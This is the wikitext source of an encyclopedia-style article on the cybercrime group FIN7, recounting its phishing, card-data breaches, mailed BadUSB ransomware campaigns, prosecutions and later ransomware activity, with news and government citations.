FIN7

In March 2017 FIN7 engaged in a spearphishing campaign of company employees involved with SEC filings.{{Cite web |title=FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings |url=https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |access-date=2021-03-15 |website=FireEye |language=en |archive-date=2021-04-19 |archive-url=https://web.archive.org/web/20210419132358/https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |url-status=dead }}

In August 2018 three members of FIN7 were charged by the United States Department of Justice for cybercrimes that impacted more than 100 U.S. companies.{{Cite web |date=2018-08-01 |title=Three Members of Notorious International Cybercrime Group "Fin7" In Custody for Role in Attacking Over 100 U.S. companies |url=https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100 |access-date=2021-03-15 |website=www.justice.gov |language=en}}

In November 2018 it was reported that FIN7 were behind data breaches of Red Robin, Chili's, Arby's, Burgerville, Omni Hotels and Saks Fifth Avenue.{{Cite web |last=Gorelik |first=Michael |title=FIN7 Not Finished – Morphisec Spots New Campaign |url=https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign |access-date=2021-03-15 |website=blog.morphisec.com |language=en-us}}

In March 2020, the FBI issued a warning that members of FIN7 have been targeting companies in the retail, restaurant, and hotel industries with BadUSB attacks designed to deliver REvil or BlackMatter ransomware.{{ r | BC_2020-03-27 }} Packages have been sent to employees in IT, executive management, and human resources departments.{{ r | BC_2020-03-27 }} One intended target was sent a package in the mail which contained a fake gift card from Best Buy as well as a USB flash drive with a letter stating that the recipient should plug the drive into their computer to access a list of items that could be purchased with the gift card.{{ r | BC_2020-03-27 | ZDNET_2020-03-26 }} When tested, the USB drive emulated a keyboard, and then initiated a series of keystrokes which opened a PowerShell window and issued commands to download malware to the test computer, and then contacted servers in Russia. {{ cite news | url=https://www.bleepingcomputer.com/news/security/fbi-hackers-sending-malicious-usb-drives-and-teddy-bears-via-usps/ | title=FBI: Hackers Sending Malicious USB Drives & Teddy Bears via USPS | last=Ilascu | first=Ionut | newspaper=Bleeping Computer | date=2020-03-27 | quote=This is not a one-off incident, though. The FBI warns that FIN7 has mailed these packages via USPS to numerous businesses (retail, restaurant, hotel industry) where they target employees in human resources, IT, or executive management departments. These packages sometimes include "gifts" like teddy bears or gift cards. These USB drives are configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker. Then, the USB device contacts domains or IP‌ addresses in Russia. }} {{cite web |last=Cimpanu |first=Catalin |date=March 26, 2020 |title=Rare BadUSB attack detected in the wild against US hospitality provider |language=en |website=ZDNet |url=https://www.zdnet.com/article/rare-badusb-attack-detected-in-the-wild-against-us-hospitality-provider/ |access-date=2021-09-07 |url-status=live|archive-url=https://web.archive.org/web/20200326141904/https://www.zdnet.com/article/rare-badusb-attack-detected-in-the-wild-against-us-hospitality-provider/ |archive-date=2020-03-26 }}

In December 2020 it was reported that FIN7 may be a close collaborator of Ryuk.{{Cite web |date=2020-12-22 |title=Collaboration between FIN7 and the RYUK group, a Truesec Investigation |url=https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/ |access-date=2021-03-15 |website=TRUESEC Blog |language=en-US}}

In April 2021 a "high-level manager" of FIN7 Fedir Hladyr from Ukraine was sentenced to 10 years of prison in the United States after he pleaded guilty to charges of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking.{{Cite web |date=2021-04-16 |title=High-level organizer of notorious hacking group FIN7 sentenced to ten years in prison for scheme that compromised tens of millions of debit and credit cards |url=https://www.justice.gov/usao-wdwa/pr/high-level-organizer-notorious-hacking-group-fin7-sentenced-ten-years-prison-scheme |access-date=2021-04-22 |website=www.justice.gov |language=en}}{{Cite web |last=Palmer |first=Danny |title='High-level' organiser of FIN7 hacking group sentenced to 10 years in prison |url=https://www.zdnet.com/article/high-level-organiser-of-fin7-hacking-group-sentenced-to-ten-years-in-prison/ |access-date=2021-04-22 |website=ZDNet |language=en}}

In January 2022, the FBI issued a warning that members of FIN7 have been targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil and or BlackMatter ransomware.{{ r | BP_2022-01-07 | ZDNET_2022-01-10 }} The intended targets were sent USB drives in packages claiming to be from Amazon or the United States Department of Health and Human Services, with letters talking about free gift cards or COVID-19 protocols that were purportedly further explained by information on the USB drive.{{ r | BP_2022-01-07 | ZDNET_2022-01-10 }} When plugged in, the USB drives emulate a keyboard, and then initiate a series of keystrokes which open a PowerShell window and issue commands to download malware. {{ cite news | url=https://www.bleepingcomputer.com/news/security/fbi-hackers-use-badusb-to-target-defense-firms-with-ransomware/ | title=FBI: Hackers use BadUSB to target defense firms with ransomware | last=Gatlan | first=Sergiu | newspaper=Bleeping Computer | date=2022-01-07 | quote=FIN7 operators impersonated Amazon and the US Department of Health & Human Services (HHS) to trick the targets into opening the packages and connecting the USB drives to their systems. Since August, reports received by the FBI say that these malicious packages also contain letters about COVID-19 guidelines or counterfeit gift cards and forged thank you notes, depending on the impersonated entity. }} {{ cite news | url=https://www.zdnet.com/article/fbi-cybercriminals-are-mailing-out-usb-drives-that-will-install-ransomware/ | title=Ransomware warning: Cyber criminals are mailing out USB drives that install malware | last=Tung | first=Liam | newspaper=ZDNET | date=2022-01-10 }}

In 2021 the group began using software known as ALPHV written in Rust, which was offered to affiliates as Ransomware as a Service.{{Cite web |url=https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat |title=2022-004: ACSC Ransomware Profile – ALPHV (aka BlackCat) |date=2022-04-14 |access-date=2023-02-12 |website=Australian Cyber Security Centre}}

In February 2023 the group was named in the Irish High Court as being behind the Munster Technological University ransomware attack.{{Cite news |title=MTU Cork confirms hackers have encrypted university data and demanded a ransom |url=https://www.thejournal.ie/mtu-cork-campuses-remain-closed-it-breach-5990335-Feb2023/ |last1=Moore |first1=Jane |work=TheJournal.ie |last2=O'Connor |first2=Niall}}

{{Reflist}}

Category:Russian advanced persistent threat groups

Category:Criminal advanced persistent threat groups